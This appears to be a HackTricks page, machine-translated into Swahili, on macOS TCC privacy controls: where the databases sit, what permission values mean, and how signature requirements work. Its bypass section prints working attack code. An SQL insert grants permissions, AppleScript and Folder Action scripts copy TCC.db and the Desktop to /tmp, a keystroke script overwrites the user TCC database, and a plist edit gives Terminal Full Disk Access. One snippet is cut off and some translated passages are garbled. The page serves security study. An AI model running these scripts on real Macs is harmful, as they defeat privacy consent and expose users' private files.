macOS TCC

Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA KUJIUNGA!
Pata bidhaa rasmi za PEASS & HackTricks
Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs za kipekee
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Maelezo Msingi

TCC (Transparency, Consent, and Control) ni itifaki ya usalama inayolenga kudhibiti ruhusa za programu. Jukumu lake kuu ni kulinda vipengele nyeti kama huduma za eneo, mawasiliano, picha, kipaza sauti, kamera, ufikivu, na ufikiaji kamili wa diski. Kwa kuhitaji idhini wazi kutoka kwa mtumiaji kabla ya kutoa programu ruhusa ya kupata vipengele hivi, TCC inaboresha faragha na udhibiti wa mtumiaji juu ya data yao.

Watumiaji wanakutana na TCC wakati programu zinapoomba upatikanaji wa vipengele vilivyolindwa. Hii inaonekana kupitia dirisha la kidukizo linalowaruhusu watumiaji kuidhinisha au kukataa upatikanaji. Zaidi ya hayo, TCC inaruhusu hatua za moja kwa moja za mtumiaji, kama vile kuvuta na kuacha faili kwenye programu, kutoa ruhusa ya kupata faili maalum, ikisimamia kwamba programu zina ufikivu tu kwa kile kilichoruhusiwa waziwazi.

TCC inashughulikiwa na daemon iliyoko katika /System/Library/PrivateFrameworks/TCC.framework/Support/tccd na imeboreshwa katika /System/Library/LaunchDaemons/com.apple.tccd.system.plist (kujiandikisha kwa huduma ya mach com.apple.tccd.system).

Kuna tccd ya mode ya mtumiaji inayofanya kazi kwa kila mtumiaji aliyeingia iliyoelezwa katika /System/Library/LaunchAgents/com.apple.tccd.plist ikijiandikisha kwa huduma za mach com.apple.tccd na com.apple.usernotifications.delegate.com.apple.tccd.

Hapa unaweza kuona tccd ikifanya kazi kama mfumo na kama mtumiaji:

ps -ef | grep tcc
0   374     1   0 Thu07PM ??         2:01.66 /System/Library/PrivateFrameworks/TCC.framework/Support/tccd system
501 63079     1   0  6:59PM ??         0:01.95 /System/Library/PrivateFrameworks/TCC.framework/Support/tccd

Permissions zinarithiwa kutoka kwa programu mzazi na ruhusa zinachunguzwa kulingana na Kitambulisho cha Pakiti na Kitambulisho cha Msanidi programu.

Databases za TCC

Ruhusa/katazo kisha hufutwa katika baadhi ya Databases za TCC:

Database ya mfumo nzima katika /Library/Application Support/com.apple.TCC/TCC.db.
Database hii inalindwa na SIP, hivyo ni kwa njia ya kukiuka SIP tu inaweza kuandika humo.
Database ya mtumiaji ya TCC $HOME/Library/Application Support/com.apple.TCC/TCC.db kwa mapendeleo ya mtumiaji.
Database hii inalindwa hivyo ni mchakato tu wenye ruhusa kubwa za TCC kama Upatikanaji Kamili wa Diski wanaweza kuandika humo (ingawa haijatambuliwa na SIP).

Databases za awali pia zinalindwa na TCC kwa upatikanaji wa kusoma. Hivyo hautaweza kusoma database yako ya kawaida ya mtumiaji wa TCC isipokuwa ni kutoka kwa mchakato wenye ruhusa kubwa za TCC.

Hata hivyo, kumbuka kwamba mchakato wenye ruhusa hizi kubwa (kama Upatikanaji Kamili wa Diski au kTCCServiceEndpointSecurityClient) utaweza kuandika database za TCC za watumiaji.

Kuna Database ya tatu ya TCC katika /var/db/locationd/clients.plist kuonyesha wateja wanaoruhusiwa kupata huduma za eneo.
Faili iliyolindwa na SIP /Users/carlospolop/Downloads/REG.db (pia iliyolindwa kutoka kwa upatikanaji wa kusoma na TCC), ina eneo la Databases zote halali za TCC.
Faili iliyolindwa na SIP /Users/carlospolop/Downloads/MDMOverrides.plist (pia iliyolindwa kutoka kwa upatikanaji wa kusoma na TCC), ina ruhusa zaidi zilizotolewa na TCC.
Faili iliyolindwa na SIP /Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist (lakini inayoweza kusomwa na yeyote) ni orodha ya programu zinazohitaji kibali cha TCC.

Database ya TCC katika iOS iko katika /private/var/mobile/Library/TCC/TCC.db

Kituo cha arifa cha UI kinaweza kufanya mabadiliko katika database ya TCC ya mfumo:

codesign -dv --entitlements :- /System/Library/PrivateFrameworks/TCC.framework/Support/tccd
[..]
com.apple.private.tcc.manager
com.apple.rootless.storage.TCC

Walakini, watumiaji wanaweza kufuta au kuuliza sheria kwa kutumia zana ya mstari wa amri ya tccutil.

Uliza mabadiliko

sqlite3 ~/Library/Application\ Support/com.apple.TCC/TCC.db
sqlite> .schema
# Tables: admin, policies, active_policy, access, access_overrides, expired, active_policy_id
# The table access contains the permissions per services
sqlite> select service, client, auth_value, auth_reason from access;
kTCCServiceLiverpool|com.apple.syncdefaultsd|2|4
kTCCServiceSystemPolicyDownloadsFolder|com.tinyspeck.slackmacgap|2|2
kTCCServiceMicrophone|us.zoom.xos|2|2
[...]

# Check user approved permissions for telegram
sqlite> select * from access where client LIKE "%telegram%" and auth_value=2;
# Check user denied permissions for telegram
sqlite> select * from access where client LIKE "%telegram%" and auth_value=0;

sqlite3 /Library/Application\ Support/com.apple.TCC/TCC.db
sqlite> .schema
# Tables: admin, policies, active_policy, access, access_overrides, expired, active_policy_id
# The table access contains the permissions per services
sqlite> select service, client, auth_value, auth_reason from access;
kTCCServiceLiverpool|com.apple.syncdefaultsd|2|4
kTCCServiceSystemPolicyDownloadsFolder|com.tinyspeck.slackmacgap|2|2
kTCCServiceMicrophone|us.zoom.xos|2|2
[...]

# Get all FDA
sqlite> select service, client, auth_value, auth_reason from access where service = "kTCCServiceSystemPolicyAllFiles" and auth_value=2;

# Check user approved permissions for telegram
sqlite> select * from access where client LIKE "%telegram%" and auth_value=2;
# Check user denied permissions for telegram
sqlite> select * from access where client LIKE "%telegram%" and auth_value=0;

Kwa kuchunguza mabandiko yote unaweza kuangalia ruhusa ambazo programu imeiruhusu, imeikataza, au haina (itauliza).

huduma ni mstari wa mabandiko wa ruhusa ya TCC
mteja ni kitambulisho cha mwavuli au njia ya binary pamoja na ruhusa
aina_ya_mteja inaonyesha ikiwa ni Kitambulisho cha Mwavuli(0) au njia kamili(1)

Jinsi ya kutekeleza ikiwa ni njia kamili

Fanya tu launctl load you_bin.plist, na plist kama hii:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<!-- Label for the job -->
<key>Label</key>
<string>com.example.yourbinary</string>

<!-- The path to the executable -->
<key>Program</key>
<string>/path/to/binary</string>

<!-- Arguments to pass to the executable (if any) -->
<key>ProgramArguments</key>
<array>
<string>arg1</string>
<string>arg2</string>
</array>

<!-- Run at load -->
<key>RunAtLoad</key>
<true/>

<!-- Keep the job alive, restart if necessary -->
<key>KeepAlive</key>
<true/>

<!-- Standard output and error paths (optional) -->
<key>StandardOutPath</key>
<string>/tmp/YourBinary.stdout</string>
<key>StandardErrorPath</key>
<string>/tmp/YourBinary.stderr</string>
</dict>
</plist>

auth_value inaweza kuwa na thamani tofauti: denied(0), unknown(1), allowed(2), au limited(3).
auth_reason inaweza kuchukua thamani zifuatazo: Error(1), User Consent(2), User Set(3), System Set(4), Service Policy(5), MDM Policy(6), Override Policy(7), Missing usage string(8), Prompt Timeout(9), Preflight Unknown(10), Entitled(11), App Type Policy(12)
Uwanja wa csreq upo hapo ili kuonyesha jinsi ya kuthibitisha binary ya kutekelezwa na kutoa ruhusa za TCC:

# Query to get cserq in printable hex
select service, client, hex(csreq) from access where auth_value=2;

# To decode it (https://stackoverflow.com/questions/52706542/how-to-get-csreq-of-macos-application-on-command-line):
BLOB="FADE0C000000003000000001000000060000000200000012636F6D2E6170706C652E5465726D696E616C000000000003"
echo "$BLOB" | xxd -r -p > terminal-csreq.bin
csreq -r- -t < terminal-csreq.bin

# To create a new one (https://stackoverflow.com/questions/52706542/how-to-get-csreq-of-macos-application-on-command-line):
REQ_STR=$(codesign -d -r- /Applications/Utilities/Terminal.app/ 2>&1 | awk -F ' => ' '/designated/{print $2}')
echo "$REQ_STR" | csreq -r- -b /tmp/csreq.bin
REQ_HEX=$(xxd -p /tmp/csreq.bin  | tr -d '\n')
echo "X'$REQ_HEX'"

Kupata maelezo zaidi kuhusu sehemu nyingine ya meza angalia chapisho hili la blogu.

Unaweza pia kuangalia ruhusa zilizotolewa tayari kwa programu katika Mapendeleo ya Mfumo --> Usalama & Faragha --> Faragha --> Faili na Folda.

Watumiaji wanaweza kufuta au kuuliza sheria kwa kutumia tccutil.

Rudisha ruhusa za TCC

# You can reset all the permissions given to an application with
tccutil reset All app.some.id

# Reset the permissions granted to all apps
tccutil reset All

Ukaguzi wa Saini ya TCC

Database ya TCC inahifadhi Bundle ID ya programu, lakini pia inahifadhi taarifa kuhusu saini ili kudhibitisha kuwa Programu inayoomba kutumia idhini ni sahihi.

# From sqlite
sqlite> select service, client, hex(csreq) from access where auth_value=2;
#Get csreq

# From bash
echo FADE0C00000000CC000000010000000600000007000000060000000F0000000E000000000000000A2A864886F763640601090000000000000000000600000006000000060000000F0000000E000000010000000A2A864886F763640602060000000000000000000E000000000000000A2A864886F7636406010D0000000000000000000B000000000000000A7375626A6563742E4F550000000000010000000A364E33385657533542580000000000020000001572752E6B656570636F6465722E54656C656772616D000000 | xxd -r -p - > /tmp/telegram_csreq.bin
## Get signature checks
csreq -t -r /tmp/telegram_csreq.bin
(anchor apple generic and certificate leaf[field.1.2.840.113635.100.6.1.9] /* exists */ or anchor apple generic and certificate 1[field.1.2.840.113635.100.6.2.6] /* exists */ and certificate leaf[field.1.2.840.113635.100.6.1.13] /* exists */ and certificate leaf[subject.OU] = "6N38VWS5BX") and identifier "ru.keepcoder.Telegram"

Kwa hivyo, programu zingine zinazotumia jina na kitambulisho cha pakiti sawa hawataweza kupata ruhusa zilizotolewa kwa programu zingine.

Haki za Kibali na TCC

Programu hazihitaji tu kuomba na kupewa upatikanaji wa baadhi ya rasilimali, pia wanahitaji kuwa na haki za kufaa. Kwa mfano, Telegram ina haki ya com.apple.security.device.camera kuomba upatikanaji wa kamera. Programu ambayo haina haki hii haitaweza kupata kamera (na mtumiaji hatakuulizwa ruhusa).

Hata hivyo, ili programu zipate upatikanaji wa folda fulani za mtumiaji, kama vile ~/Desktop, ~/Downloads na ~/Documents, hawana haja ya kuwa na haki maalum za kibali. Mfumo utashughulikia upatikanaji kwa uwazi na kumwuliza mtumiaji kama inavyohitajika.

Programu za Apple hazitatoa maombi ya ruhusa. Zina haki zilizotolewa mapema kwenye orodha yao ya haki za kibali, maana hawatatoa dirisha la maombi, wala hawataonekana kwenye databases za TCC. Kwa mfano:

codesign -dv --entitlements :- /System/Applications/Calendar.app
[...]
<key>com.apple.private.tcc.allow</key>
<array>
<string>kTCCServiceReminders</string>
<string>kTCCServiceCalendar</string>
<string>kTCCServiceAddressBook</string>
</array>

Hii itazuia Kalenda kuuliza mtumiaji kupata kumbusho, kalenda na anwani.

Isipokuwa kwa baadhi ya nyaraka rasmi kuhusu ruhusa, pia inawezekana kupata habari isiyo rasmi kuhusu ruhusa katika https://newosxbook.com/ent.jl

Baadhi ya ruhusa za TCC ni: kTCCServiceAppleEvents, kTCCServiceCalendar, kTCCServicePhotos... Hakuna orodha ya umma inayoeleza zote lakini unaweza kuangalia hii orodha ya zinazojulikana.

Maeneo yasiyolindwa kwa hisia

$HOME (yenyewe)
$HOME/.ssh, $HOME/.aws, nk
/tmp

Nia ya Mtumiaji / com.apple.macl

Kama ilivyotajwa awali, inawezekana kutoa ruhusa kwa Programu kupata faili kwa kuidondosha kwake. Upatikanaji huu hautatajwa katika hifadhidata yoyote ya TCC lakini kama mali iliyozidishwa ya faili. Mali hii ita hifadhi UUID ya programu iliyoruhusiwa:

xattr Desktop/private.txt
com.apple.macl

# Check extra access to the file
## Script from https://gist.githubusercontent.com/brunerd/8bbf9ba66b2a7787e1a6658816f3ad3b/raw/34cabe2751fb487dc7c3de544d1eb4be04701ac5/maclTrack.command
macl_read Desktop/private.txt
Filename,Header,App UUID
"Desktop/private.txt",0300,769FD8F1-90E0-3206-808C-A8947BEBD6C3

# Get the UUID of the app
otool -l /System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal| grep uuid
uuid 769FD8F1-90E0-3206-808C-A8947BEBD6C3

Ni kushangaza kwamba sifa ya com.apple.macl inasimamiwa na Sandbox, si tccd.

Pia elewa kwamba ikiwa unahamisha faili inayoruhusu UUID ya programu kwenye kompyuta yako kwenda kwenye kompyuta tofauti, kwa sababu programu hiyo itakuwa na UIDs tofauti, haitatoa upatikanaji kwa programu hiyo.

Sifa iliyozidishwa com.apple.macl haiwezi kufutwa kama sifa zingine zilizozidishwa kwa sababu inalindwa na SIP. Hata hivyo, kama ilivyoelezwa katika chapisho hili, inawezekana kuidisable kwa kuzip faili, kuzifuta na kuzip.

TCC Privesc & Bypasses

Ingiza kwenye TCC

Ikiwa kwa wakati fulani unafanikiwa kupata ufikiaji wa kuandika kwenye database ya TCC unaweza kutumia kitu kama hiki kuongeza kuingia (ondoa maoni):

Mfano wa Kuweka kwenye TCC

```sql INSERT INTO access ( service, client, client_type, auth_value, auth_reason, auth_version, csreq, policy_id, indirect_object_identifier_type, indirect_object_identifier, indirect_object_code_identity, flags, last_modified, pid, pid_version, boot_uuid, last_reminded ) VALUES ( 'kTCCServiceSystemPolicyDesktopFolder', -- service 'com.googlecode.iterm2', -- client 0, -- client_type (0 - bundle id) 2, -- auth_value (2 - allowed) 3, -- auth_reason (3 - "User Set") 1, -- auth_version (always 1) X'FADE0C00000000C40000000100000006000000060000000F0000000200000015636F6D2E676F6F676C65636F64652E697465726D32000000000000070000000E000000000000000A2A864886F7636406010900000000000000000006000000060000000E000000010000000A2A864886F763640602060000000000000000000E000000000000000A2A864886F7636406010D0000000000000000000B000000000000000A7375626A6563742E4F550000000000010000000A483756375859565137440000', -- csreq is a BLOB, set to NULL for now NULL, -- policy_id NULL, -- indirect_object_identifier_type 'UNUSED', -- indirect_object_identifier - default value NULL, -- indirect_object_code_identity 0, -- flags strftime('%s', 'now'), -- last_modified with default current timestamp NULL, -- assuming pid is an integer and optional NULL, -- assuming pid_version is an integer and optional 'UNUSED', -- default value for boot_uuid strftime('%s', 'now') -- last_reminded with default current timestamp ); ```

Malipo ya TCC

Ikiwa umefanikiwa kuingia kwenye programu na baadhi ya ruhusa za TCC angalia ukurasa ufuatao na malipo ya TCC kuzitumia:

pagemacOS TCC Payloads

Matukio ya Apple

Jifunze kuhusu Matukio ya Apple katika:

pagemacOS Apple Events

Utoaji wa (Finder) kwa FDA*

Jina la TCC la ruhusa ya Utoaji ni: kTCCServiceAppleEvents Ruhusa maalum ya TCC pia inaonyesha programu inayoweza kusimamiwa ndani ya database ya TCC (hivyo ruhusa haziruhusu tu kusimamia kila kitu).

Finder ni programu ambayo ina FDA daima (hata kama haionekani kwenye UI), hivyo ikiwa una ruhusa za Utoaji juu yake, unaweza kutumia ruhusa zake kufanya vitendo fulani. Katika kesi hii programu yako itahitaji ruhusa kTCCServiceAppleEvents juu ya com.apple.Finder.

# This AppleScript will copy the system TCC database into /tmp
osascript<<EOD
tell application "Finder"
set homeFolder to path to home folder as string
set sourceFile to (homeFolder & "Library:Application Support:com.apple.TCC:TCC.db") as alias
set targetFolder to POSIX file "/tmp" as alias
duplicate file sourceFile to targetFolder with replacing
end tell
EOD

osascript<<EOD
tell application "Finder"
set sourceFile to POSIX file "/Library/Application Support/com.apple.TCC/TCC.db" as alias
set targetFolder to POSIX file "/tmp" as alias
duplicate file sourceFile to targetFolder with replacing
end tell
EOD

Ungekiuka hii kwa kuandika database yako ya mtumiaji ya TCC.

Kwa idhini hii utaweza kuomba finder kupata folda zilizozuiliwa na TCC na kukupa faili, lakini kwa kadri ninavyojua huenda usiweze kufanya Finder kutekeleza nambari za kupotosha kikamilifu kufaidi ufikiaji wake wa FDA.

Hivyo basi, hautaweza kufaidi uwezo kamili wa FDA.

Hii ni onyo la TCC kupata ruhusa ya Uendeshaji juu ya Finder:

Tafadhali kumbuka kwamba kwa sababu programu ya Automator ina idhini ya TCC kTCCServiceAppleEvents, inaweza kudhibiti programu yoyote, kama Finder. Kwa hivyo, ukiwa na idhini ya kudhibiti Automator unaweza pia kudhibiti Finder na nambari kama ile ifuatayo:

Pata kabati ndani ya Automator

```applescript osascript<

tell application "Automator" set actionID to Automator action id "com.apple.RunShellScript" tell (make new workflow) add actionID to it tell last Automator action set value of setting "inputMethod" to 1 set value of setting "COMMAND_STRING" to theScript end tell execute it end tell activate end tell EOD

Once inside the shell you can use the previous code to make Finder copy the TCC databases for example and not TCC prompt will appear

</details>

Inatokea vivyo hivyo na **Programu ya Script Editor,** inaweza kudhibiti Finder, lakini kutumia AppleScript hauwezi kulazimisha kutekeleza script.

### Uendeshaji wa (SE) kwa baadhi ya TCC

**Matukio ya Mfumo yanaweza kuunda Vitendo vya Folda, na Vitendo vya Folda vinaweza kupata folda fulani za TCC** (Desktop, Nyaraka & Vipakuliwa), hivyo script kama ile ifuatayo inaweza kutumika kudhuru tabia hii:
```bash
# Create script to execute with the action
cat > "/tmp/script.js" <<EOD
var app = Application.currentApplication();
app.includeStandardAdditions = true;
app.doShellScript("cp -r $HOME/Desktop /tmp/desktop");
EOD

osacompile -l JavaScript -o "$HOME/Library/Scripts/Folder Action Scripts/script.scpt" "/tmp/script.js"

# Create folder action with System Events in "$HOME/Desktop"
osascript <<EOD
tell application "System Events"
-- Ensure Folder Actions are enabled
set folder actions enabled to true

-- Define the path to the folder and the script
set homeFolder to path to home folder as text
set folderPath to homeFolder & "Desktop"
set scriptPath to homeFolder & "Library:Scripts:Folder Action Scripts:script.scpt"

-- Create or get the Folder Action for the Desktop
if not (exists folder action folderPath) then
make new folder action at end of folder actions with properties {name:folderPath, path:folderPath}
end if
set myFolderAction to folder action folderPath

-- Attach the script to the Folder Action
if not (exists script scriptPath of myFolderAction) then
make new script at end of scripts of myFolderAction with properties {name:scriptPath, path:scriptPath}
end if

-- Enable the Folder Action and the script
enable myFolderAction
end tell
EOD

# File operations in the folder should trigger the Folder Action
touch "$HOME/Desktop/file"
rm "$HOME/Desktop/file"

Uendeshaji wa Kiotomatiki (SE) + Upatikanaji (`kTCCServicePostEvent`|`kTCCServiceAccessibility`) kwa FDA*

Uendeshaji wa Kiotomatiki kwenye System Events + Upatikanaji (kTCCServicePostEvent) inaruhusu kutuma vibonyezo kwa michakato. Kwa njia hii unaweza kutumia Finder kubadilisha TCC.db ya watumiaji au kumpa FDA programu yoyote (ingawa nywila inaweza kuhitajika kwa hili).

Mfano wa Finder kubadilisha TCC.db ya watumiaji:

-- store the TCC.db file to copy in /tmp
osascript <<EOF
tell application "System Events"
-- Open Finder
tell application "Finder" to activate

-- Open the /tmp directory
keystroke "g" using {command down, shift down}
delay 1
keystroke "/tmp"
delay 1
keystroke return
delay 1

-- Select and copy the file
keystroke "TCC.db"
delay 1
keystroke "c" using {command down}
delay 1

-- Resolve $HOME environment variable
set homePath to system attribute "HOME"

-- Navigate to the Desktop directory under $HOME
keystroke "g" using {command down, shift down}
delay 1
keystroke homePath & "/Library/Application Support/com.apple.TCC"
delay 1
keystroke return
delay 1

-- Check if the file exists in the destination and delete if it does (need to send keystorke code: https://macbiblioblog.blogspot.com/2014/12/key-codes-for-function-and-special-keys.html)
keystroke "TCC.db"
delay 1
keystroke return
delay 1
key code 51 using {command down}
delay 1

-- Paste the file
keystroke "v" using {command down}
end tell
EOF

`kTCCServiceAccessibility` hadi FDA*

Angalia ukurasa huu kwa baadhi ya payloads za kutumia ruhusa za Ufikivu kwa privesc hadi FDA* au kutekeleza keylogger kwa mfano.

Mteja wa Usalama wa Endpoint hadi FDA

Ikiwa una kTCCServiceEndpointSecurityClient, una FDA. Mwisho.

Sera ya Mfumo ya Faili ya SysAdmin hadi FDA

kTCCServiceSystemPolicySysAdminFiles inaruhusu kubadilisha sifa ya NFSHomeDirectory ya mtumiaji ambayo inabadilisha folda yake ya nyumbani na hivyo kuruhusu kupita TCC.

DB ya TCC ya Mtumiaji hadi FDA

Kupata ruhusa za kuandika kwenye database ya mtumiaji ya TCC huwezi kujipa ruhusa za FDA, tu yule anayeishi kwenye database ya mfumo anaweza kutoa hiyo.

Lakini unaweza kujipa haki za Utoaji wa Finder, na kutumia mbinu iliyopita kwa privesc hadi FDA*.

Ruhusa za FDA hadi TCC

Ufikivu Kamili wa Diski jina la TCC ni kTCCServiceSystemPolicyAllFiles

Sioni hii kama privesc halisi, lakini kwa tahadhari: Ikiwa unadhibiti programu na FDA unaweza kubadilisha database ya TCC ya watumiaji na kujipa ufikivu wowote. Hii inaweza kuwa muhimu kama mbinu ya kudumu ikiwa unaweza kupoteza ruhusa zako za FDA.

Kupuuza SIP hadi Kupuuza TCC

Database ya mfumo ya TCC inalindwa na SIP, ndio sababu mchakato tu wenye haki zilizotajwa zitaruhusiwa kubadilisha. Kwa hivyo, ikiwa mshambuliaji anapata kupuuza SIP juu ya faili (kuweza kubadilisha faili iliyozuiwa na SIP), ataweza:

Ondoa ulinzi wa database ya TCC, na kujipa ruhusa zote za TCC. Anaweza kutumia faili yoyote kwa mfano:
Database za mfumo wa TCC
REG.db
MDMOverrides.plist

Hata hivyo, kuna chaguo lingine la kutumia kupuuza SIP hii kupuuza TCC, faili /Library/Apple/Library/Bundles/TCC_Compatibility.bundle/Contents/Resources/AllowApplicationsList.plist ni orodha ya programu zinazohitaji kipekee ya TCC. Kwa hivyo, ikiwa mshambuliaji anaweza kuondoa ulinzi wa SIP kutoka kwa faili hii na kuongeza programu yake mwenyewe programu hiyo itaweza kupuuza TCC. Kwa mfano kuongeza terminal:

# Get needed info
codesign -d -r- /System/Applications/Utilities/Terminal.app

Faili ya AllowApplicationsList.plist:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Services</key>
<dict>
<key>SystemPolicyAllFiles</key>
<array>
<dict>
<key>CodeRequirement</key>
<string>identifier &quot;com.apple.Terminal&quot; and anchor apple</string>
<key>IdentifierType</key>
<string>bundleID</string>
<key>Identifier</key>
<string>com.apple.Terminal</string>
</dict>
</array>
</dict>
</dict>
</plist>

Kizuizi za TCC

Marejeo

PreviousmacOS SIP NextmacOS Apple Events

Last updated 3 days ago